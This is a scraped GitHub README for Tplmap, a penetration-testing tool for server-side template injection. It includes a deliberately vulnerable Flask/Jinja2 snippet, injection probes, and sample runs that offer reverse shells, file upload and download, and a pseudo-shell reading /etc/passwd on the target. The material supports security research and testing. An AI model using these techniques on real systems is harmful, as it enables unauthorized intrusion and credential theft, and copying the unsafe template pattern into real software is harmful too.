Skip to content


Switch branches/tags

Name already in use

A tag already exists with the provided branch name. Many Git commands accept both tag and branch names, so creating this branch may cause unexpected behavior. Are you sure you want to create this branch?


Failed to load latest commit information.
Latest commit message
Commit time
February 6, 2022 15:13
October 29, 2018 21:17
February 6, 2022 15:12
April 18, 2018 17:30
July 24, 2016 20:22
January 17, 2021 14:36
July 13, 2018 23:12


This project is no longer maintained. I'm happy to merge new PRs as long they don't break the test suite.

Tplmap assists the exploitation of Code Injection and Server-Side Template Injection vulnerabilities with a number of sandbox escape techniques to get access to the underlying operating system.

The tool and its test suite are developed to research the SSTI vulnerability class and to be used as offensive security tool during web application penetration tests.

The sandbox break-out techniques came from James Kett's Server-Side Template Injection: RCE For The Modern Web App, other public researches [1] [2], and original contributions to this tool [3] [4].

It can exploit several code context and blind injection scenarios. It also supports eval()-like code injections in Python, Ruby, PHP, Java and generic unsandboxed template engines.

Server-Side Template Injection

Assume that you are auditing a web site that generates dynamic pages using templates composed with user-provided values, such as this web application written in Python and Flask that uses Jinja2 template engine in an unsafe way.

from flask import Flask, request
from jinja2 import Environment

app = Flask(__name__)
Jinja2 = Environment()

def page():

    name = request.values.get('name')
    # The vulnerability is introduced concatenating the
    # user-provided `name` variable to the template string.
    output = Jinja2.from_string('Hello ' + name + '!').render()
    # Instead, the variable should be passed to the template context.
    # Jinja2.from_string('Hello {{name}}!').render(name = name)

    return output

if __name__ == "__main__":'', port=80)

From a black box testing perspective, the page reflects the value similarly to a XSS vulnerability, but also computes basic operation at runtime disclosing its SSTI nature.

$ curl -g ''
Hello John!
$ curl -g '{{7*7}}'
Hello 49!


Tplmap is able to detect and exploit SSTI in a range of template engines to get access to the underlying file system and operating system. Run it against the URL to test if the parameters are vulnerable.

$ ./ -u ''
[+] Tplmap 0.5
    Automatic Server-Side Template Injection Detection and Exploitation Tool

[+] Testing if GET parameter 'name' is injectable
[+] Smarty plugin is testing rendering with tag '{*}'
[+] Smarty plugin is testing blind injection
[+] Mako plugin is testing rendering with tag '${*}'
[+] Jinja2 plugin is testing rendering with tag '{{*}}'
[+] Jinja2 plugin has confirmed injection with tag '{{*}}'
[+] Tplmap identified the following injection point:

  GET parameter: name
  Engine: Jinja2
  Injection: {{*}}
  Context: text
  OS: linux
  Technique: render

   Shell command execution: ok
   Bind and reverse shell: ok
   File write: ok
   File read: ok
   Code evaluation: ok, python code

[+] Rerun tplmap providing one of the following options:

    --os-shell                Run shell on the target
    --os-cmd                  Execute shell commands
    --bind-shell PORT         Connect to a shell bind to a target port
    --reverse-shell HOST PORT Send a shell back to the attacker's port
    --upload LOCAL REMOTE     Upload files to the server
    --download REMOTE LOCAL   Download remote files

Use --os-shell option to launch a pseudo-terminal on the target.

$ ./ --os-shell -u ''
[+] Tplmap 0.5
    Automatic Server-Side Template Injection Detection and Exploitation Tool

[+] Run commands on the operating system.

linux $ whoami
linux $ cat /etc/passwd

Supported template engines

Tplmap supports over 15 template engines, unsandboxed template engines and generic eval()-like injections.

Engine Remote Command Execution Blind Code evaluation File read File write
Mako Python
Jinja2 Python
Python (code eval) Python
Tornado Python
Nunjucks JavaScript
Pug JavaScript
doT JavaScript
Marko JavaScript
JavaScript (code eval) JavaScript
Dust (<= dustjs-helpers@1.5.0) JavaScript
EJS JavaScript
Ruby (code eval) Ruby
Slim Ruby
ERB Ruby
Smarty (unsecured) PHP
PHP (code eval) PHP
Twig (<=1.19) PHP
Freemarker Java
Velocity Java
Twig (>1.19) × × × × ×
Smarty (secured) × × × × ×
Dust (> dustjs-helpers@1.5.0) × × × × ×

Burp Suite Plugin

See burp_extension/